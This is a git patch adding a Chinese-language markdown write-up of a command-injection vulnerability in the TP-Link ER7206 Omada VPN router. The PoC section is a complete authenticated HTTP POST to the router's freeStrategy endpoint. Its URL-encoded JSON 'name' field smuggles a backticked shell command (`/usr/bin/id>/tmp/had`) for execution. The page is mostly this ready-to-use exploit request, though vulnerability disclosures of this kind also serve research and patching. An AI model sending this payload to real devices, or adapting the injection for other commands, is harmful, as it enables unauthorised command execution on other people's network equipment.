From d1c6344c792b6b28fd1bb717c0a3313196add078 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 1 Apr 2024 19:48:16 +0800
Subject: [PATCH] =?UTF-8?q?Create=20TP-Link-ER7206=E5=AD=98=E5=9C=A8?=
 =?UTF-8?q?=E5=91=BD=E4=BB=A4=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 TP-Link-ER7206存在命令注入漏洞.md | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 TP-Link-ER7206存在命令注入漏洞.md

diff --git a/TP-Link-ER7206存在命令注入漏洞.md b/TP-Link-ER7206存在命令注入漏洞.md
new file mode 100644
index 0000000..7017bfc
--- /dev/null
+++ b/TP-Link-ER7206存在命令注入漏洞.md
@@ -0,0 +1,20 @@
+## TP-Link-ER7206存在命令注入漏洞
+
+Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591 的访客资源功能中存在命令执行漏洞。特制的 HTTP 请求可能导致任意命令执行。攻击者可以发出经过身份验证的 HTTP 请求来触发此漏洞
+
+
+## poc
+```
+POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
+Host: 192.168.8.100
+User-Agent: python-requests/2.31.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
+Content-Length: 470
+
+data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D 
+```